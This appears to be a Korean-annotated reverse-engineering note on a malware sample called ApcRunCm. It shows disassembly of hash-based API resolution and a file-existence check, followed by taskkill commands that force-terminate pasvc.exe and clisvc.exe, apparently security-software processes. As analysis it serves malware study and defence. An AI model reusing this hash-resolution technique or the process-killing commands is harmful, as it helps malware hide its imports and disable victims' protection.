|
004023FA . 53 PUSH EBX ; kernel32.7C7D353C
004023FB . 55 PUSH EBP ; kernel32.7C7D0000
004023FC . 56 PUSH ESI ; kernel32.7C7D7376
004023FD . 57 PUSH EDI
004023FE . 8B6C24 18 MOV EBP, DWORD PTR SS:[ESP+0X18] ; ApcRunCm.0040116C
00402402 . 8B45 3C MOV EAX, DWORD PTR SS:[EBP+0X3C]
00402405 . FF7405 78 PUSH DWORD PTR SS:[EBP+EAX+0X78]
00402409 . FF7405 7C PUSH DWORD PTR SS:[EBP+EAX+0X7C]
0040240D . 8B5405 78 MOV EDX, DWORD PTR SS:[EBP+EAX+0X78]
00402411 . 03D5 ADD EDX, EBP ; kernel32.7C7D0000
00402413 . 8B4A 18 MOV ECX, DWORD PTR DS:[EDX+0X18]
00402416 . 8B5A 20 MOV EBX, DWORD PTR DS:[EDX+0X20]
00402419 . 03DD ADD EBX, EBP ; kernel32.7C7D0000
0040241B . E3 70 JECXZ 0X0040248D
0040241D . 49 DEC ECX
0040241E . 8B348B MOV ESI, DWORD PTR DS:[EBX+ECX*4]
00402421 . 03F5 ADD ESI, EBP ; kernel32.7C7D0000
00402423 . 33FF XOR EDI, EDI
00402425 . FC CLD
00402426 > 33C0 XOR EAX, EAX
00402428 . AC LODSB
00402429 . 3AC4 CMP AL, AH
0040242B . 74 07 JE 0X00402434
0040242D . C1CF 0D ROR EDI, 0X0D ; 사용하는 함수의 리스트를 암호화 하여, 원래의 문구로 돌리는 중........
00402430 03F8 ADD EDI, EAX
00402432 ^ EB F2 JMP 0X00402426
00402434 3B7C24 1C CMP EDI, DWORD PTR SS:[ESP+0X1C]
00402438 ^ 75 E1 JNE 0X0040241B
0040243A 8B5A 24 MOV EBX, DWORD PTR DS:[EDX+0X24] ; 사용할 함수 GetProcAddress 호출 / bp 걸고 분석하면 사용하는 함수들 다 건질 수 있음.
0040243D 03DD ADD EBX, EBP ; kernel32.7C7D0000
0040243F 66:8B0C4B MOV CX, WORD PTR DS:[EBX+ECX*2]
00402443 8B5A 1C MOV EBX, DWORD PTR DS:[EDX+0X1C]
00402446 03DD ADD EBX, EBP ; kernel32.7C7D0000
00402448 8B048B MOV EAX, DWORD PTR DS:[EBX+ECX*4]
0040244B 8BD8 MOV EBX, EAX
0040244D 03C5 ADD EAX, EBP ; kernel32.7C7D0000
0040244F 3B5C24 04 CMP EBX, DWORD PTR SS:[ESP+0X04]
00402453 7C 3C JL 0X00402491
00402455 2B5C24 04 SUB EBX, DWORD PTR SS:[ESP+0X04]
00402459 . 3B1C24 CMP EBX, DWORD PTR SS:[ESP]
0040245C . 7F 33 JNLE 0X00402491
0040245E . 807C24 24 00 CMP BYTE PTR SS:[ESP+0X24], 0X00000000
00402463 . 74 28 JE 0X0040248D
00402465 . 807C24 28 00 CMP BYTE PTR SS:[ESP+0X28], 0X00000000
0040246A . 74 21 JE 0X0040248D
0040246C . 83EC 10 SUB ESP, 0X10 ; 또 다른 DLL 호출
0040246F . 8BF0 MOV ESI, EAX
00402471 . 8BFC MOV EDI, ESP
00402473 > AC LODSB
00402474 . AA STOSB
00402475 . 3C 2E CMP AL, 0X2E
00402477 .^ 75 FA JNE 0X00402473
00402479 . C647 FF 00 MOV BYTE PTR DS:[EDI-0X01], 0X00000000
0040247D . 54 PUSH ESP
0040247E . FF5424 38 CALL DWORD PTR SS:[ESP+0X38] ; kernel32.GetProcAddress
00402482 . 56 PUSH ESI ; kernel32.7C7D7376
00402483 . 50 PUSH EAX
00402484 . FF5424 40 CALL DWORD PTR SS:[ESP+0X40]
00402488 . 83C4 10 ADD ESP, 0X10
0040248B . EB 04 JMP 0X00402491
0040248D . 33C0 XOR EAX, EAX
0040248F . EB 00 JMP 0X00402491
00402491 > 83C4 08 ADD ESP, 0X08
00402494 . 5F POP EDI
00402495 . 5E POP ESI ; kernel32.7C7D7376
00402496 . 5D POP EBP ; kernel32.7C7D0000
00402497 . 5B POP EBX ; kernel32.7C7D353C
00402498 . C3 RET
IAT 기록 (004027C1)
호출 순서
OpenFileMappingA -> CreateFileMappingA -> GetWindowsDirectoryA -> strcat -> PathFileExistsA -> InitializeCriticalSection
004011E5 . 57 PUSH EDI ; ApcRunCm.00402991
004011E6 . 6A 10 PUSH 0X00000010
004011E8 . 53 PUSH EBX
004011E9 . 6A 04 PUSH 0X00000004
004011EB . 53 PUSH EBX
004011EC . 6A FF PUSH 0XFFFFFFFF
004011EE . FF96 38030000 CALL DWORD PTR DS:[ESI+0X00000338] ; kernel32.CreateFileMappingA
004011F4 . 68 03010000 PUSH 0X00000103
004011F9 . 8D85 F4FEFFFF LEA EAX, DWORD PTR SS:[EBP-0X0000010C]
004011FF . 50 PUSH EAX
00401200 . FF96 3C030000 CALL DWORD PTR DS:[ESI+0X0000033C] ; kernel32.GetWindowsDirectoryA
00401206 . 8D86 2E050000 LEA EAX, DWORD PTR DS:[ESI+0X0000052E]
0040120C . 50 PUSH EAX
0040120D . 8D85 F4FEFFFF LEA EAX, DWORD PTR SS:[EBP-0X0000010C]
00401213 . 50 PUSH EAX
00401214 . FF96 A8030000 CALL DWORD PTR DS:[ESI+0X000003A8] ; msvcrt.strcat
0040121A . 59 POP ECX ; ApcRunCm.00402499
0040121B . 59 POP ECX ; ApcRunCm.00402499
0040121C . 8D85 F4FEFFFF LEA EAX, DWORD PTR SS:[EBP-0X0000010C]
00401222 . 50 PUSH EAX
00401223 . FF96 CC030000 CALL DWORD PTR DS:[ESI+0X000003CC] ; shlwapi.PathFileExistsA / C:\Windows\Temp\~v3.log 파일이 있는 유무 확인
00401229 . 85C0 TEST EAX, EAX
0040122B . 75 6C JNE 0X00401299
0040122D . 56 PUSH ESI ; ApcRunCm.00402499
0040122E . FF96 B0020000 CALL DWORD PTR DS:[ESI+0X000002B0] ; ApcRunCm.004021B2 / taskkill 을 통한 프로세스 종료
C:\Windows\Temp\~v3.log 파일 유무 확인
없을 경우
taskkill /F /IM pasvc.exe 실행
taskkill /F /IM clisvc.exe 실행
0040122E . FF96 B0020000 CALL DWORD PTR DS:[ESI+0X000002B0] ; ApcRunCm.004021B2
00401234 . 8D46 10 LEA EAX, DWORD PTR DS:[ESI+0X10]
00401237 . 59 POP ECX ; 0012FDC0
00401238 . 50 PUSH EAX
00401239 . 8945 FC MOV DWORD PTR SS:[EBP-0X04], EAX
0040123C . FF96 40030000 CALL DWORD PTR DS:[ESI+0X00000340] ; kernel32.InitializeCriticalSection
00401242 . 8D46 28 LEA EAX, DWORD PTR DS:[ESI+0X28]
00401245 . 50 PUSH EAX
00401246 . 8945 F8 MOV DWORD PTR SS:[EBP-0X08], EAX
00401249 . FF96 40030000 CALL DWORD PTR DS:[ESI+0X00000340] ; kernel32.InitializeCriticalSection
0040124F . 56 PUSH ESI ; ApcRunCm.00402499
00401250 . 895D 08 MOV DWORD PTR SS:[EBP+0X08], EBX
00401253 . FF96 5C020000 CALL DWORD PTR DS:[ESI+0X0000025C] ; ApcRunCm.0040129E / GetVersion 확인
이후 Thread를 돌림. |